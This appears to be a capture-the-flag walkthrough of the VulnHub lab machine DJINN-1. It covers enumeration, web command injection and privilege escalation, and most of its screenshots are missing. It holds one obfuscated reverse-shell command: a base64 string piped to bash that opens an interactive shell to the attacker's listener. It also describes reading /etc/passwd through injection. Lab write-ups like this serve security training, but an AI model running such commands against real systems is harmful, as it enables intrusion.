Wednesday, November 10, 2021

DJINN-1

 DJINN-1

- Layout for this exercise:



1 - INTRODUCTION

The goal of this exercise is to develop a hacking process for the vulnerable machine DJINN-1 from the VulnHub pentesting platform.

- DJINN-1 can be downloaded from here:

https://www.vulnhub.com/entry/djinn-1,397/

- Once downloaded DJINN-1 and extracted with VirtualBox:






2 - ENUMERATION

- Scanning with Nmap we learn that  ports 21, 1337, 7331 are open:



- FTP allows Anonymous login. Also, there are 3 text files available:



- Port 1337 holds a math game:




- Port 7331 runs a web server:




- Connecting to FTP server we find the 3 text files:






- Getting creds.txt, game.txt and message.txt:




- Reading the 3 files:





- Connecting to web browser at port 7331:




- Dirbusting port 7331 we find web pages genie and wish:





- Connecting to genie:





- Connecting to wish:





- Executing command id:





- The server redirects to web page genie and outputs answer at URL:























- Same thing for command pwd:
















- Same thing for command ls:











3 - EXPLOITATION

- One potential vector attack  would be to execute remotely a bash command at wish web page.

- The bash command is encoded with base64:





- Setting a nc listener session at port 4444:





- Entering the command to wish, previously decoding and passing it to bash:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTUvNDQ0NCAwPiYxCg== | base64 -d | bash



- Finally, a remote shell is triggered at Kali:





- Removing the nasty duplicated letters with command stty -echo:





- Improving the shell:


- There are home folders for users nitish and sam:





- Exploring nitish we find user.txt, but access is denied:












- Reading app.py we find a line pointing to nitish credentials:









- So folder .dev keeps file creds.txt with credentials for user nitish:









4 - CAPTURING THE 1st FLAG

- Now, the 1st flag is available:



5 - PRIVILEGE ESCALATION

- There are different ways to achieve Privilege Escalation, we will try two of them:

5.1 - Sudoers

- Checking sudoer privileges we learn that nitish can run command genie as user sam:








- Checking genie file type we discover it has setuid:






- Discovering how genie works:







- Passing some inputs to command genie:







- Finally we are able to get a shell for user sam:



- Checking sam's sudoer privileges, he can run command lago as a root:



- Running command lago with different inputs:





























- Checking the file .pyc we find that it's a compiled bytecode Python script:




- Also, opening .pyc  we find a lot of words that recall of lago:



- So it seems reasonable to think that it could be a close relationship between lago and .pyc. Maybe are the same thing?

-  With the purpose of studying in dept the file, let's transfer .pyc from DIJNN-1 to Kali:





- Installing decompiler uncompyle6:






- Decompyling .pyc we find that it actually corresponds to script lago, and there is a couple of lines that give us the answer to achieve a /bin/sh shell:


- So entering word num as answer finally we get a root shell:



5.2 - Remote command injection

- Connecting with nc to port 1337 there is a math game:


- Trying a remote injection with command pwd the result is successful:


- Same thing with command ls:


- Same thing with command cat /etc/passwd:















- Setting a listening session at port 4444:



- Injecting  this remote command:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet










- Finally, a reverse shell is back at Kali:



6 - CAPTURING THE 2nd FLAG

- Going to root folder:


- Reading proof.sh:

























- Executing proof.sh:




at